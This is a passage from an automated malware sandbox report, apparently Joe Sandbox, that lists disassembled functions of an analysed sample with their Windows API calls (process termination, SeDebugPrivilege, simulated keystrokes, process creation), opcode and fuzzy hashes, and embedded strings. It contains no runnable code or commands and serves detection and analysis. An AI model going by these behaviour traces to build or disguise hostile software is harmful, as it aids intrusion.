                                                  • Opcode ID: d87dfd220f311620fdfb936a790922ed3d300393267b1488d2ada05d5003e2b7
                                                  • Instruction ID: 87558202aece4274d2be7263def6550fe4bdf9010eeeb1909775fd955003ec66
                                                  • Opcode Fuzzy Hash: d87dfd220f311620fdfb936a790922ed3d300393267b1488d2ada05d5003e2b7
                                                  • Instruction Fuzzy Hash: 19418DB1501608BFEB258F51CCC5FBE7BACEF08355F08412AFE059A141E7709E419BA0
                                                  Function 00C68C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C7F910), ref: 00C68D28
                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C7F910), ref: 00C68D5C
                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C68ED6
                                                  • SysFreeString.OLEAUT32(?), ref: 00C68F00
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                  • String ID:
                                                  • API String ID: 560350794-0
                                                  • Opcode ID: 7e0990bfa85d2f6817479b2f340e83de9c4165d39b3624f51cda260cb54b277e
                                                  • Instruction ID: e6f231e7e4692cc19da7a0bc68a08400681e907eb85701de25ffb80302d16cde
                                                  • Opcode Fuzzy Hash: 7e0990bfa85d2f6817479b2f340e83de9c4165d39b3624f51cda260cb54b277e
                                                  • Instruction Fuzzy Hash: 34F14C75A00109EFCF24DF94C884EAEB7B9FF49314F108598F915AB251DB31AE46CB61
                                                  Function 00C6F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C6F6B5
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C6F848
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C6F86C
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C6F8AC
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C6F8CE
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C6FA4A
                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C6FA7C
                                                  • CloseHandle.KERNEL32(?), ref: 00C6FAAB
                                                  • CloseHandle.KERNEL32(?), ref: 00C6FB22
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                  • String ID:
                                                  • API String ID: 4090791747-0
                                                  • Opcode ID: b97de73f592679b9672bc2b39e1f643b4e3ae67cc8faaa730ae434d31f424051
                                                  • Instruction ID: 4ea44d07df4dcb26f0053efa4bb53b0ea985d5672849d5d10f39d415d86f541e
                                                  • Opcode Fuzzy Hash: b97de73f592679b9672bc2b39e1f643b4e3ae67cc8faaa730ae434d31f424051
                                                  • Instruction Fuzzy Hash: 81E1B0312043049FC724EF24D881B6EBBE1EF89354F14856DF9998B2A2CB31DD86DB52
                                                  Function 00C54CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C5466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C53697,?), ref: 00C5468B
                                                    • Part of subcall function 00C5466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C53697,?), ref: 00C546A4
                                                    • Part of subcall function 00C54A31: GetFileAttributesW.KERNEL32(?,00C5370B), ref: 00C54A32
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00C54D40
                                                  • _wcscmp.LIBCMT ref: 00C54D5A
                                                  • MoveFileW.KERNEL32(?,?), ref: 00C54D75
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                  • String ID:
                                                  • API String ID: 793581249-0
                                                  • Opcode ID: 13db39bf3e9ce6546dbb1f580dc85fcb2c7a5f42a41c55863a8f07471f2b2730
                                                  • Instruction ID: fd212e7bd17b3a5885c67a0db3857f7b1f3f35c57cea70c8fc94989996478b87
                                                  • Opcode Fuzzy Hash: 13db39bf3e9ce6546dbb1f580dc85fcb2c7a5f42a41c55863a8f07471f2b2730
                                                  • Instruction Fuzzy Hash: 735163B60083449BC728DBA4D8819DF73ECAF85355F00092EF689C3151EE70A6CCD76A
                                                  Function 00C78645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C786FF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: 594de51fb63c4d09701fa5f92a5873a4bb5c696cf0134000702b0df9b7a147c5
                                                  • Instruction ID: 966be7c5c151aaa7b2e9f2c249864e0eb7caa8ff16dfdf3594894ac56f155064
                                                  • Opcode Fuzzy Hash: 594de51fb63c4d09701fa5f92a5873a4bb5c696cf0134000702b0df9b7a147c5
                                                  • Instruction Fuzzy Hash: 1A519330680244BEDB249B25CC8DFAD7BA5FB05750F608115FB2DE61E1CF71AA88DB51
                                                  Function 00BF2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C2C2F7
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C2C319
                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C2C331
                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C2C34F
                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C2C370
                                                  • DestroyIcon.USER32(00000000), ref: 00C2C37F
                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C2C39C
                                                  • DestroyIcon.USER32(?), ref: 00C2C3AB
                                                    • Part of subcall function 00C7A4AF: DeleteObject.GDI32(00000000), ref: 00C7A4E8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                  • String ID:
                                                  • API String ID: 2819616528-0
                                                  • Opcode ID: 3df5a2a48e6099b7e0f190d06fbdfe9539a4cf1899f1bf9ba2349e8990d942e9
                                                  • Instruction ID: 0be2f4d57d12e5059dcc731bd1aa2037141eebfb974b02bf0b678956d30aac81
                                                  • Opcode Fuzzy Hash: 3df5a2a48e6099b7e0f190d06fbdfe9539a4cf1899f1bf9ba2349e8990d942e9
                                                  • Instruction Fuzzy Hash: 20518570A40209AFDB24DF65DC85BBE3BF5EB08310F104668FA16E72A0DB70AD85DB50
                                                  Function 00C4966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C4A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C4A84C
                                                    • Part of subcall function 00C4A82C: GetCurrentThreadId.KERNEL32 ref: 00C4A853
                                                    • Part of subcall function 00C4A82C: AttachThreadInput.USER32(00000000,?,00C49683,?,00000001), ref: 00C4A85A
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C4968E
                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C496AB
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C496AE
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C496B7
                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C496D5
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C496D8
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C496E1
                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C496F8
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C496FB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                  • String ID:
                                                  • API String ID: 2014098862-0
                                                  • Opcode ID: 129310ef99fd86901ef88438806158c9a9a21cf80bf32704e743a5c1b2a82840
                                                  • Instruction ID: ff66f1f14ba516a16d6b226b84600fca275ff1e3bf6f739892058d98651ce437
                                                  • Opcode Fuzzy Hash: 129310ef99fd86901ef88438806158c9a9a21cf80bf32704e743a5c1b2a82840
                                                  • Instruction Fuzzy Hash: F811CEB1950218BFF7106B719C89F6E3E2DEB4C760F510429F248AB0A0C9F25C91DAA4
                                                  Function 00C48921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C4853C,00000B00,?,?), ref: 00C4892A
                                                  • HeapAlloc.KERNEL32(00000000,?,00C4853C,00000B00,?,?), ref: 00C48931
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C4853C,00000B00,?,?), ref: 00C48946
                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00C4853C,00000B00,?,?), ref: 00C4894E
                                                  • DuplicateHandle.KERNEL32(00000000,?,00C4853C,00000B00,?,?), ref: 00C48951
                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C4853C,00000B00,?,?), ref: 00C48961
                                                  • GetCurrentProcess.KERNEL32(00C4853C,00000000,?,00C4853C,00000B00,?,?), ref: 00C48969
                                                  • DuplicateHandle.KERNEL32(00000000,?,00C4853C,00000B00,?,?), ref: 00C4896C
                                                  • CreateThread.KERNEL32(00000000,00000000,00C48992,00000000,00000000,00000000), ref: 00C48986
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                  • String ID:
                                                  • API String ID: 1957940570-0
                                                  • Opcode ID: d08fb48f33da4be41d1385a1a257c2deb24d2d0a180326622164027321a77a1e
                                                  • Instruction ID: bdc57817b5fc7a227d671c9af2bf3aa9b9dd31afff0a6ec139979f4a4fd6f3f6
                                                  • Opcode Fuzzy Hash: d08fb48f33da4be41d1385a1a257c2deb24d2d0a180326622164027321a77a1e
                                                  • Instruction Fuzzy Hash: 4F01AC75240304FFE710ABA5DC89F6F3B6CEB89711F404425FA09DB191CA7098418A20
                                                  Function 00C69B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                  • API String ID: 0-572801152
                                                  • Opcode ID: a96230cc333bee39b8cd739d38bd0a39f5e0588e2ee08ab167be2a9cdb8eda37
                                                  • Instruction ID: f25569066cc3ead2818f88ae52b663eb3e18cb798e2ccaa1fe8d22ce5d58b121
                                                  • Opcode Fuzzy Hash: a96230cc333bee39b8cd739d38bd0a39f5e0588e2ee08ab167be2a9cdb8eda37
                                                  • Instruction Fuzzy Hash: 20C19371A0021AAFDF20DF98D9C4BAEB7F9FF48314F148469E915A7280E7719E45CB90
                                                  Function 00C69113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$_memset
                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                  • API String ID: 2862541840-625585964
                                                  • Opcode ID: 3b949f43e3262da3b5016b4b397f15b3ef51ac5a231be33740b1711c370d72ce
                                                  • Instruction ID: d926a7757ac5352005c771afe219ad969a4948f4ad6feee5923d0970d06eb7b9
                                                  • Opcode Fuzzy Hash: 3b949f43e3262da3b5016b4b397f15b3ef51ac5a231be33740b1711c370d72ce
                                                  • Instruction Fuzzy Hash: 44918F71A00219EBDF34DFA5C888FAEB7B8EF45714F108169F915AB290D7709A45CFA0
                                                  Function 00C6975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C4710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?,?,?,00C47455), ref: 00C47127
                                                    • Part of subcall function 00C4710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?,?), ref: 00C47142
                                                    • Part of subcall function 00C4710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?,?), ref: 00C47150
                                                    • Part of subcall function 00C4710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?), ref: 00C47160
                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C69806
                                                  • _memset.LIBCMT ref: 00C69813
                                                  • _memset.LIBCMT ref: 00C69956
                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00C69982
                                                  • CoTaskMemFree.OLE32(?), ref: 00C6998D
                                                  Strings
                                                  • NULL Pointer assignment, xrefs: 00C699DB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                  • String ID: NULL Pointer assignment
                                                  • API String ID: 1300414916-2785691316
                                                  • Opcode ID: 4315741f6bc05a32f14cdef6d55f31960e5a45fc50dee53291b73a9fb4587872
                                                  • Instruction ID: d1a6dd98ac0d3b847fc1b2ce702744feeb95f9f577829e2fafd60123d7ff6804
                                                  • Opcode Fuzzy Hash: 4315741f6bc05a32f14cdef6d55f31960e5a45fc50dee53291b73a9fb4587872
                                                  • Instruction Fuzzy Hash: 29911671D00219EBDB20DFA5DC85EEEBBB9EF09310F10416AF519A7291DB719A44CFA0
                                                  Function 00C76D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C76E24
                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00C76E38
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C76E52
                                                  • _wcscat.LIBCMT ref: 00C76EAD
                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C76EC4
                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C76EF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window_wcscat
                                                  • String ID: SysListView32
                                                  • API String ID: 307300125-78025650
                                                  • Opcode ID: 7dd4374d775aeaacfff71fdd76429b97b30c61da3f7ce5f6da481b210fe99455
                                                  • Instruction ID: 46fc161cb3bdedddb73387c78760863af0abe5756a7ea0c17079663b592370b6
                                                  • Opcode Fuzzy Hash: 7dd4374d775aeaacfff71fdd76429b97b30c61da3f7ce5f6da481b210fe99455
                                                  • Instruction Fuzzy Hash: 0B41B174A00308AFDB219FA4CC85BEE77F8EF08754F10846AF598E7191D6719E848B60
                                                  Function 00C6E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C53C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00C53C7A
                                                    • Part of subcall function 00C53C55: Process32FirstW.KERNEL32(00000000,?), ref: 00C53C88
                                                    • Part of subcall function 00C53C55: CloseHandle.KERNEL32(00000000), ref: 00C53D52
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C6E9A4
                                                  • GetLastError.KERNEL32 ref: 00C6E9B7
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C6E9E6
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C6EA63
                                                  • GetLastError.KERNEL32(00000000), ref: 00C6EA6E
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C6EAA3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2533919879-2896544425
                                                  • Opcode ID: ab3e06a608211e028190ba67a02ca72d28c2b40119fc818d179e231624a54897
                                                  • Instruction ID: 7666a97db3e92cc31212aa1e94c0b03cd44b70e30ac73f83777a0383a2282073
                                                  • Opcode Fuzzy Hash: ab3e06a608211e028190ba67a02ca72d28c2b40119fc818d179e231624a54897
                                                  • Instruction Fuzzy Hash: 9F41AB302002009FDB20EF64CCD5F7DBBA5AF40350F088459F9169B2D2DB70A949DB91
                                                  Function 00C52F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00C53033
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: IconLoad
                                                  • String ID: blank$info$question$stop$warning
                                                  • API String ID: 2457776203-404129466
                                                  • Opcode ID: de9885c969bdbda29f41c4176d5acbe38a87ace881423bf4d9571b0a8c2f2c10
                                                  • Instruction ID: 3221fd5425b9c4a92119b8cfbf8d6203dcc565b44a47b672960535fe97ec4da1
                                                  • Opcode Fuzzy Hash: de9885c969bdbda29f41c4176d5acbe38a87ace881423bf4d9571b0a8c2f2c10
                                                  • Instruction Fuzzy Hash: 50118E397483C67FE7158A54DC82DAB779C9F163A2B10002AFD10561C2DB715FC825A8
                                                  Function 00C542F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C54312
                                                  • LoadStringW.USER32(00000000), ref: 00C54319
                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C5432F
                                                  • LoadStringW.USER32(00000000), ref: 00C54336
                                                  • _wprintf.LIBCMT ref: 00C5435C
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C5437A
                                                  Strings
                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00C54357
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
